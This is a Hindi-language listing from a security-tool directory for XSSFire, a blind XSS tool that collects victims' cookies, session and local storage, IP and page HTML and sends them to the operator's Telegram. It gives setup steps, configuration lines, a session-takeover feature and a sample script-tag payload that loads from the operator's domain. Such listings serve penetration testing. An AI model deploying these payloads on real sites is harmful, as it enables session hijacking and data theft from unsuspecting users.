Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/seifelsallamy/xssfire
शोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubseifelsallamy/xssfire

XSSFire

एक स्टैंडअलोन ब्लाइंड XSS स्क्रिप्ट।

रिपॉजिटरी देखें
471041 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XSSFire

एक स्टैंडअलोन ब्लाइंड XSS स्क्रिप्ट।

यह कैसे काम करता है:

स्क्रिप्ट PHP और JavaScript का संयोजन है, यह JS का उपयोग करके डेटा कैप्चर करता है और इसे स्वयं स्क्रिप्ट में भेजता है, फिर यह रिपोर्ट फ़ाइलें बनाता है और उन्हें Telegram के माध्यम से वितरित करता है।

आवश्यकताएँ:

  1. Linux पर चलने वाला वेब सर्वर जिसमें एक डोमेन और SSL प्रमाणपत्र हो।
  2. Telegram खाता (BXSS रिपोर्ट प्राप्त करने के लिए)

Telegram क्यों?

सेटअप करना आसान। तेज़। सुलभ।

विशेषताएँ:

  1. कैप्चर करता है: IP, User-Agent, Date-Time, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, यदि Iframe से फायर किया गया हो
  2. सेशन बिल्डर: एक JavaScript जो सेशन को पुनर्निर्मित कर सकता है, कैप्चर किया गया URL और devtools खोलें, फिर इसे कंसोल में पेस्ट करें और एंटर दबाएं। यदि आप पर्याप्त भाग्यशाली हैं तो आप सेशन को अपने कब्जे में ले सकते हैं।
  3. Telegram सूचनाएँ: ईमेल की तुलना में सेटअप करना तेज़ और आसान, और अधिक सुलभ।
  4. एंटी-स्पैम: आपको प्रत्येक कैप्चर किए गए URL के लिए केवल एक/दो सूचना मिलनी चाहिए। हालाँकि, स्क्रिप्ट समय-समय पर रीसेट होती है ताकि बाद में आपको फिर से सूचित कर सके।
  5. एन्क्रिप्शन: आप स्क्रिप्ट में एक पासवर्ड सेट कर सकते हैं और Telegram में प्राप्त रिपोर्ट एक पासवर्ड-संरक्षित zip फ़ाइल होगी। (Telegram बॉट एंड-टू-एंड एन्क्रिप्शन का उपयोग नहीं कर रहे हैं)।
  6. HTML स्नैपशॉट: यह एक HTML फ़ाइल है जो रिपोर्ट के साथ वितरित की जाएगी, इसे आपके लक्ष्य के पेज के समान दिखना चाहिए।

सेटअप:

  1. Telegram पर जाएं और @botfather से चैट करें।
  2. चैट में /start लिखें और नया बॉट बनाएं।
  3. बॉट बनाते समय आपको अपना bot token प्राप्त होना चाहिए।
  4. टोकन को अलग सहेज लें।
  5. अब अपने नए बनाए गए बॉट चैट पर जाएं, उसे स्टार्ट करें और फिर हाय कहें।
  6. फिर यहां जाएं: https://api.telegram.org/bot<bot_token>/getUpdates
  7. और अपना chat id सहेज लें।
  8. XSSFire स्क्रिप्ट खोलें और निम्न पंक्तियों को संशोधित करें:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
  1. स्क्रिप्ट को अपने सर्वर पर अपलोड करें।

पेलोड उत्पन्न करने के लिए आप Blind-XSS-Manager का उपयोग करने पर विचार कर सकते हैं https://github.com/SeifElsallamy/Blind-XSS-Manager आप इस एक्सटेंशन के माध्यम से डोमेन फ़ील्ड में yourdomain.com/

नोट: आप फ़ाइल का नाम बदलकर index.php कर सकते हैं और इसे अपने सर्वर की मुख्य निर्देशिका में अपलोड कर सकते हैं ताकि पेलोड छोटे हो जाएं, फिर पेलोड कुछ इस प्रकार दिखना चाहिए <script src="https://yourdomain.com"></script>।

स्नैपशॉट:

bxss
bxss2
bxss3

धन्यवाद GPT-3 xD

टूल डाउनलोड करें